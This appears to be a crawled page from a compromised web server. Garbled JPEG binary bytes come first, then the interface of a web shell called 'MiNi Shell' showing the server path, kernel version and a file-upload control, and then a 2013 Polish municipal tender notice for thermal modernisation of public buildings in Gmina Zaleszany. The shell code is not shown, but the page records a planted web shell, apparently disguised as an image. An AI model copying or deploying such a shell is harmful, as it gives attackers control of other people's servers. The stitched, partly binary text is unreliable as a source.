JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130418/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130418/153752-N-2013.html

<p class="kh_header"><b>Zaleszany: Termomodernizacja obiektów użyteczności publicznej  w Gminie Zaleszany</b><br>
<b>Numer ogłoszenia: 153752 - 2013; data zamieszczenia: 18.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Zaleszany , ul. Tadeusza Kościuszki 16, 37-415 Zaleszany, woj. podkarpackie, tel. 015 845-94-19, faks 015 845-94-24.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja obiektów użyteczności publicznej  w Gminie Zaleszany.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres rzeczowy zamówienia obejmuje wykonanie zadania: Termomodernizacja  obiektów użyteczności publicznej  w Gminie Zaleszany
ZADANIE NR 1:
Termomodernizacja budynku Publicznej Szkoły Podstawowej w Kotowej Woli:docieplenie dachu, docieplenie ścian zewnętrznych, przebudowa systemu c.o.,przebudowa systemu c.w.u., wymiana stolarki okiennej i drzwiowej
ZADANIE NR 2:
Termomodernizacja budynku Domu Ludowego w Majdanie Zbydniowskim: docieplenie dachu, docieplenie ścian zewnętrznych, montaż nawiewników higrosterownych
ZADANIE NR 3:
Termomodernizacja budynku Publicznej Szkoły Podstawowej w Majdanie Zbydniowskim-Wólce Turebskiej: docieplenie dachu, docieplenie ścian zewnętrznych, przebudowa systemu c.o., wymiana stolarki okiennej i drzwiowej
ZADANIE NR 4:
Termomodernizacja budynku Domu Ludowgo w Motyczu Szlacheckim: docieplenie dachu, docieplenie ścian zewnętrznych, przebudowa systemu c.o., wymiana stolarki okiennej i drzwiowej
ZADANIE NR 5:
Termomodernizacja budynku Publicznej Szkoły Podstawowej w Skowierzynie: docieplenie dachu, docieplenie ścian zewnętrznych, przebudowa systemu c.o., wymiana stolarki okiennej i drzwiowej
ZADANIE NR 6:
Termomodernizacja budynku Publicznej Szkoły Podstawowej w Turbi, docieplenie dachu, docieplenie ścian zewnętrznych, przebudowa systemu c.o. 
ZADANIE NR 7:
Termomodernizacja budynku Publicznej Szkoły Podstawowej w Zaleszanach: docieplenie dachu, docieplenie ścian zewnętrznych, przebudowa systemu c.o., wymiana stolarki okiennej i drzwiowej
ZADANIE NR 8:
Termomodernizacja budynku Remizy Ochotniczej Straży Pożarnej w Zbydniowie: docieplenie dachu, docieplenie ścian zewnętrznych, przebudowa systemu c.o., wymiana stolarki okiennej i drzwiowej
ZADANIE NR 9:
Termomodernizacja budynku Publicznej Szkoły Podstawowej w Zbydniowie: docieplenie dachu, docieplenie ścian zewnętrznych, przebudowa systemu c.o., wymiana stolarki okiennej i drzwiowej

Szczegółowy zakres robót precyzują załączone szczegółowe przedmiary robót oraz - 
Załącznik Nr 4.1, 4.2, 4.3, 4.4, 4.5, 4.6, 4.7, 4.8, 4.9..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.26.21.00-2, 45.32.00.00-6, 45.44.30.00-4, 45.42.00.00-7, 45.31.00.00-3, 45.33.11.00-7, 45.26.12.15-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wykonawca przystępujący do przetargu zobowiązany jest do wniesienia wadium w wysokości:
a)dla zadania nr 1 w wysokości 11.000,00 zł (słownie: jedenaście tysięcy złotych)   
b)dla zadania nr 2 w wysokości 2.200,00 zł  (słownie: dwa tysiące dwieście złotych)
c)dla zadania nr 3 w wysokości 5.000,00 zł (słownie: pięć tysięcy złotych)
d)dla zadania nr 4 w wysokości  2.800,00 zł (słownie: dwa tysiące osiemset złotych)
e)dla zadania nr 5 w wysokości 7.500,00 zł słownie: siedem tysięcy pięćset złotych)
f)dla zadania nr 6 w wysokości 7.100,00 zł (słownie: siedem tysięcy sto złotych)
g)dla zadania nr7 w wysokości 9.400,00zł (słownie: dziewięć tysięcy czterysta złotych)
h)dla zadania nr 8 w wysokości 5.400,00 zł (słownie: pięć tysięcy czterysta złotych)
i)dla zadania nr 9 w wysokości 14.200,00 zł (słownie: czternaście tysięcy dwieście złotych) do dnia 07.05.2013r.do godz. 9.00

2.Wadium powinno być wniesione w wybranej przez wykonawcę formie zgodnie z art. 45, ust. 6 ustawy Prawo Zamówień Publicznych.
3.W przypadku wnoszenia wadium w formie pieniądza wymaganą kwotę należy wpłacić na konto Zamawiającego na rachunek bankowy Nr 09 4399 0007 2001 0000 0329 0005 Bank Spółdzielczy w Zaleszanach.
4.W przypadku wnoszenia wadium w pozostałych dopuszczalnych formach - dokument wadium należy złożyć w Sekretariacie (pok. Nr 8) Urzędu Gminy w Zaleszanach, zaś kserokopię potwierdzoną za zgodność do oferty.
5.Nie wniesienie wadium w wymaganym terminie oraz wymaganej wysokości 
i formie skutkuje wykluczeniem Wykonawcy z postępowania. 
6.Zgodnie z art. 46 ust. 4a. ustawy Prawo zamówień publicznych w przypadku nieuzupełnienia oferty w terminie wskazanym w wezwaniu do jej uzupełnienia wadium przepada na rzecz Zamawiającego.
7.Zwrot wadium nastąpi zgodnie z warunkami określonymi w art. 46 ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony poprzez złożenie oświadczenia przez wykonawcę - wzór oświadczenia stanowi załącznik nr 1do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony poprzez złożenie oświadczenia przez wykonawcę - wzór oświadczenia stanowi załącznik nr 1 do SIWZ oraz musi wykazać, że posiada wiedzę i doświadczenie w zakresie realizacji robót stanowiących przedmiot zamówienia tj. zrealizował w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, jako generalny wykonawca lub podwykonawca co najmniej trzy roboty o podobnym charakterze o łącznej wartości co najmniej 1 000 000,00zł. Spełnianie w/w warunku Zamawiający oceniał będzie na podstawie załączonego do oferty wykazu robót budowlanych określonych w rozdz. VI pkt. 2.1. b) niniejszej SIWZ, sporządzonego wg wzoru stanowiącego załącznik nr 6 do SIWZ i załączonych dokumentów potwierdzających (dowodów), że wymienione w nim roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony poprzez złożenie oświadczenia przez wykonawcę - wzór oświadczenia stanowi załącznik nr 1do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony poprzez złożenie oświadczenia przez wykonawcę - wzór oświadczenia stanowi załącznik nr 1do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony poprzez złożenie oświadczenia
przez wykonawcę - wzór oświadczenia stanowi załącznik nr 1 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne dokumenty:
a)Pisemne zobowiązanie innych podmiotów do oddania wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy, 8.5, 8.5 zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charaktery prawnego łączących go z nimi stosunków. 
W przypadku udostępnienia wiedzy i doświadczenia, zobowiązanie winno określać formę udziału w.w podmiotu w realizacji zamówienia (podwykonawstwo, konsultacje, itp.).
b)Lista podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt. 5 ustawy Pzp, albo informacja o tym, że wykonawca nie należy do grupy kapitałowej (załącznik nr 7 do SIWZ).
2.4. Pozostałe wymagane dokumenty:
a)Formularz ofertowy - załącznik nr 1 do SIWZ. Jeżeli wykonawca składa ofertę na więcej niż jedno zadanie, dla każdego zadania przedkłada osobny formularz ofertowy.
b)Kosztorys ofertowy sporządzony na podstawie przedmiaru robót - 
zał. Nr 4.1, 4.2, 4.3, 4.4, 4.5, 4.6 , 4.7 , 4.8 , 4.9  do SIWZ w wersji  uproszczonej.
c)Kopię wniesienia wadium.
d)Harmonogram rzeczowo-finansowy robót - opracowany na podstawie Załącznika nr 8 do SIWZ dla każdego zadania oddzielnie.
e)Pełnomocnictwo dla osoby podpisującej ofertę, do podejmowania zobowiązań w imieniu wykonawcy (jeżeli reprezentuje go pełnomocnik) oraz pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość dokonania zmiany zawartej umowy, na poniżej określonych warunkach:
a) gdy konieczność zmiany, w tym w zakresie wysokości wynagrodzenia, związana jest ze zmianą powszechnie obowiązujących przepisów prawa (np. w zakresie zmiany wysokości stawki podatku VAT);
b) konieczności zmiany terminu realizacji w związku z:
- koniecznością wprowadzenia zmian w dokumentacji projektowej, a wynikających z konieczności dostosowania zakresu zadania do wytycznych programowych lub powszechnie obowiązujących przepisów prawa lub
- z brakiem możliwości prowadzenia robót na skutek obiektywnych warunków klimatycznych lub
- działaniem siły wyższej w rozumieniu przepisów Kodeksu cywilnego lub
- nieterminowym, z przyczyn niezależnych od Wykonawcy, przekazania przez Zamawiającego terenu budowy Wykonawcy lub
- wstrzymaniem prac budowlanych przez właściwy organ z przyczyn niezawinionych przez Wykonawcę lub
- opóźnieniem związanym z uzyskiwaniem przez Wykonawcę niezbędnych w myśl ustawy Prawo budowlane dokumentów lub
- innymi okolicznościami niepowstałymi z winy Wykonawcy lub

2.Wszelkie zmiany, jakie strony chciałyby wprowadzić do ustaleń wynikających z niniejszej umowy, wymagają formy pisemnej i zgody obu stron pod rygorem nieważności takich zmian.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zaleszany.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Zaleszany, Plac Kościuszki 5/2 (Budynek Ośrodka Zdrowia) 37-415 Zaleszany.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.05.2013 godzina 09:00, miejsce: Urząd Gminy w Zaleszanach, ul. Tadeusza Kościuszki 16, 37-415 Zaleszany, Pokój Nr 8.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn.:
-Termomodernizacja obiektów użyteczności publicznej  w Gminie Zaleszany-
dofinansowany z Regionalnego Programu Operacyjnego Województwa Podkarpackiego
 na lata 2007 - 2013 z Europejskiego Funduszu Rozwoju Regionalnego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Termomodernizacja budynku Publicznej Szkoły Podstawowej w Kotowej Woli.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - docieplenie dachu 
- docieplenie ścian zewnętrznych 
- przebudowa systemu c.o. 
-  przebudowa systemu c.w.u. 
-  wymiana stolarki okiennej i drzwiowej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.32.00.00-6, 45.44.30.00-4, 45.42.00.00-7, 45.31.00.00-3, 45.33.11.00-7, 45.26.12.15-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Termomodernizacja budynku Domu Ludowego w Majdanie Zbydniowskim.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - docieplenie dachu 
- docieplenie ścian zewnętrznych 
- montaż nawiewników higrosterownych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.32.00.00-6, 45.44.30.00-4, 45.33.11.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Termomodernizacja budynku Publicznej Szkoły Podstawowej w Majdanie Zbydniowskim-Wólce Turebskiej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - docieplenie dachu 
- docieplenie ścian zewnętrznych 
- przebudowa systemu c.o. 
-  wymiana stolarki okiennej i drzwiowej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.44.30.00-4, 45.42.00.00-7, 45.33.11.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Termomodernizacja budynku Domu Ludowgo w Motyczu Szlacheckim.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - docieplenie dachu 
- docieplenie ścian zewnętrznych 
- przebudowa systemu c.o. 
-  wymiana stolarki okiennej i drzwiowej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.32.00.00-6, 45.44.30.00-4, 45.42.00.00-7, 45.31.00.00-3, 45.33.11.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Termomodernizacja budynku Publicznej Szkoły Podstawowej w Skowierzynie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - docieplenie dachu 
- docieplenie ścian zewnętrznych 
- przebudowa systemu c.o. 
-  wymiana stolarki okiennej i drzwiowej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.32.00.00-6, 45.44.30.00-4, 45.42.00.00-7, 45.33.11.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Termomodernizacja budynku Publicznej Szkoły Podstawowej w Turbi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - docieplenie dachu 
- docieplenie ścian zewnętrznych 
- przebudowa systemu c.o..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.32.00.00-6, 45.44.30.00-4, 45.33.11.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Termomodernizacja budynku Publicznej Szkoły Podstawowej w Zaleszanach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - docieplenie dachu 
- docieplenie ścian zewnętrznych 
- przebudowa systemu c.o. 
- wymiana stolarki okiennej i drzwiowej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.32.00.00-6, 45.44.30.00-4, 45.42.00.00-7, 45.33.11.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Termomodernizacja budynku Remizy Ochotniczej Straży Pożarnej w Zbydniowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - docieplenie dachu 
- docieplenie ścian zewnętrznych 
- przebudowa systemu c.o. 
-  wymiana stolarki okiennej i drzwiowej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.32.00.00-6, 45.44.30.00-4, 45.42.00.00-7, 45.33.11.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Termomodernizacja budynku Publicznej Szkoły Podstawowej w Zbydniowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - docieplenie dachu 
- docieplenie ścian zewnętrznych 
- przebudowa systemu c.o. 
- wymiana stolarki okiennej i drzwiowej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.32.00.00-6, 45.44.30.00-4, 45.42.00.00-7, 45.33.11.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com